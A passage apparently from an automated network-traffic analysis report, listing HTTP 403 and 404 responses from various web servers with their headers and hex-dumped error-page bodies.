Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:57 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=Baho2n07LPvOYWNlMTEyNjcwYTZmZDQ2OGYyMGI2YzYxYzVkOTdk;Path=/X-Contextid: iDnnhtQX/eJozWb1AData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:58 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: ab6cfb6f-7d5f-4d2b-b96b-e0a7a1b119ccCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cdTp2ntyiihykyePBJi%2B%2FPNzYjb17rSbi5Fr3M%2BlGz9CcH7j1Y%2FOn1kEzRntysRBku8XUFphzA0sMv3HPZqPAm%2B3BbM524L80C012yDvPiMGomQKrz%2FZ3tLRcN7l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=145.999908Server: cloudflareCF-RAY: 7e1d6e438a608fec-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:58 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BX+O9BUAe5s/ZGE2MzU3OWQxNTcyYWQwMTEzODdjNzMxYzkyNmM4;Path=/X-Contextid: 8RJqrBsz/z2eU3YrTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:58 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:58 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:08:15 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B7wJXEF%2F%2BhZi4h4it%2B4yn48ffzxataKbGnn2PcOFPzk3yLG9oW0abam9S4DFH%2BWA45i7Dn1S8qUWnaJv0eqjdPbOhD4QuzJ2WeIQTZuEEg2zTv9xkA1Wznwrooqj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6e535d5e9974-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:08:00 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BV/OgnzhLED6YjA2ZDY3NTNlN2I0MzczOTRhZTA0MGNiZWU2OWJh;Path=/X-Contextid: OI4R7IfF/6i63gO15Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:08:00 GMTContent-Type: text/html;charset=utf8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingSet-Cookie: 4b91bab64185417e705f062d95a43eef=9768d874a097e67905a8c0bbbd978261;Cache-Control: no-cacheData Raw: 38 66 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 3f 62 74 77 61 66 3d 31 34 32 32 37 34 34 36 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 8f<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/?btwaf=14227446"; </script>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:08:01 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BQEtEbvGsEqkZTNiM2I0ODNlMmIwYTIyMjE0M2ExNTI5MzAyYjJj;Path=/X-Contextid: 5PoyQ0b3/xzrr9Lp0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 